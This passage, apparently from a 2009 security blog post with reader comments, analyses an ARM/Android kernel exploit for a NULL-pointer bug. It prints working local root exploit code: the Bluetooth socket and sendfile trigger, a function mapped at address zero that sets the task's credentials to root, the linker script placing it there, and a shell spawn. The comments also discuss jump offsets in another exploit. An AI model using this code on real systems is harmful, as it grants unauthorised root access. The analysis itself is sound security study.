{
	do_get_root();

	if (got_root == 1) {
		printf("Got root!\n");
	} else {
		printf("Didn't get root.\n");
		return -1;
	}

	execl("/system/bin/sh", "/system/bin/sh", "-", NULL);
	return -1;
}

And do_get_root() routine is the previously shown trigger code…

static void do_get_root(void)
{
	int fdin, fdout;
	char template[] = "/sdcard/droidsploidXXXXXX";

	printf("ROOTING\n");

	fdin = mkstemp(template);
	unlink(template);
	ftruncate(fdin, PAGE_SIZE);

	fdout = socket(PF_BLUETOOTH, SOCK_DGRAM, 0);
	sendfile(fdout, fdin, NULL, PAGE_SIZE);

	return;
}

The awesome part of the exploit is how it inserts a function into the NULL page. By having a look at own.c we can read this:

int __attribute__((section(".null"))) root_sendpage(void *sk, void *page, int offset, size_t size, int flags)
{
	current->uid = current->euid = 0;
	current->gid = current->egid = 0;
	got_root = 1;
	return -ECONNREFUSED;
}
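
The section attribute is not specific to kernel or ARM code. A minimal sketch, assuming GCC or Clang targeting ELF (the section name .demo_null and the function are invented for this example):

```c
/* Ask the compiler to emit this function into a custom ELF section. */
__attribute__((section(".demo_null"), noinline))
int demo_in_custom_section(int x)
{
        return x + 1;
}
```

In an ordinary build the linker places .demo_null wherever its default script puts unknown executable sections, so the function behaves like any other one. It only ends up at a chosen address when a linker script assigns the section to a specific memory region.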

And as we can read in GCC’s documentation, this attribute places the function in the specified section instead of .text, which is the default one. The rest of the code is extremely straightforward: it just sets the UID, EUID, GID and EGID of the current task to those of root. To get that section mapped at address 0, the author includes a linker script named armelf.x. This script, among other things, defines these:

/* Do we need any of these for elf?
   __DYNAMIC = 0;    */
MEMORY {
  allspace (rwx) : org = 0x8000, len = 32M
  nullspace (rwx) : org = 0, len = 0x1000
}
SECTIONS
{
     ...
  .null           :
  {
    *(.null)
  } >nullspace

So, it introduces a new section named .null which is placed at address 0, in a memory region exactly one page long (0x1000, which is 4096 in decimal) with rwx permissions. This is where the root_sendpage() routine is inserted, and triggering the bug results in executing it in the kernel’s context. Pretty nice exploit approach.

Written by xorl

August 18, 2009 at 18:21

Posted in linux, vulnerabilities

11 Responses


Excellent write up as usual :-)

(Btw, the mmap_min_addr bypass was discovered by both Julien and me :)).

Tavis Ormandy

August 18, 2009 at 20:20
There is one thing that I can’t understand…
In Przemysław Frasunek’s exploit in line:
*(unsigned long *)2 = (unsigned long)&kernel_code - 6;
We are subbing 6 from address of kernel_code() because we want to hit into the ret instruction from previous function?

Clay

August 19, 2009 at 13:47
needs more “why” instead of “what” — otherwise you miss a bit of subtle magic :p

just an example: it’s obvious that i set 0xff and 0x25, etc, but the “why” is what’s important.

spender

August 20, 2009 at 04:22
Good write up, mate.

Bishan Kochher

August 20, 2009 at 10:04
First of all, sorry for the extremely delayed replies. I have some issues that are more important than a hobby blog atm.

@Clay: i’m not sure. You can ask the author of the exploit code.

@spender: Enlighten me. I guess that it has something to do with the reliability/stability of the kernel after the exploitation.

xorl

August 22, 2009 at 12:53
With little modification:
*(unsigned long *)2 = (unsigned long)&kernel_code;

I got segmentation fault:
Code: Bad EIP value.
EIP: [] 0x8048800 SS:ESP 0068:eae6dde0

BUT if I paste in first line kernel_code() function something like this:
__asm__ ("ret");

or:
__asm__ ("leave");

of even:
__asm__ ("mov $0x1, %eax");

then everything is perfect (almost)…

but if I use:
__asm__ ("nop");

again I got SIGSEGV. I think this is my last comment.
@xorl: author not response for my email.

Clay

August 23, 2009 at 03:14
@Clay: You must use -6 since the JMP instruction’s displacement is relative to the current address (which is 6 = 2 1-byte opcodes + 4 bytes kernel_code() address).

@xorl: Although this is not the appropriate blog entry, I hope this post is not too late! I wish you good luck with whatever you are up to from now on. All the best!

./hk

huku

August 25, 2009 at 22:38
@Clay: No surprise he didn’t answer you. Nobody is interested in teaching kids (no offense) trivial things. What about two preceding bytes, aren’t they any relevant ? Bingo! :)

qaaz

August 25, 2009 at 22:53
http://www.doecirc.energy.gov/bulletins/t-217.shtml
can u tell me how to trigger that vuln
10x :)

hogz

August 27, 2009 at 10:43
@hogs: My google search for that bug returned this:
http://pastebin.ca/1545178
Hope this helps.

xorl

August 27, 2009 at 22:36
http://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html

0x0

August 30, 2009 at 17:17

xorl %eax, %eax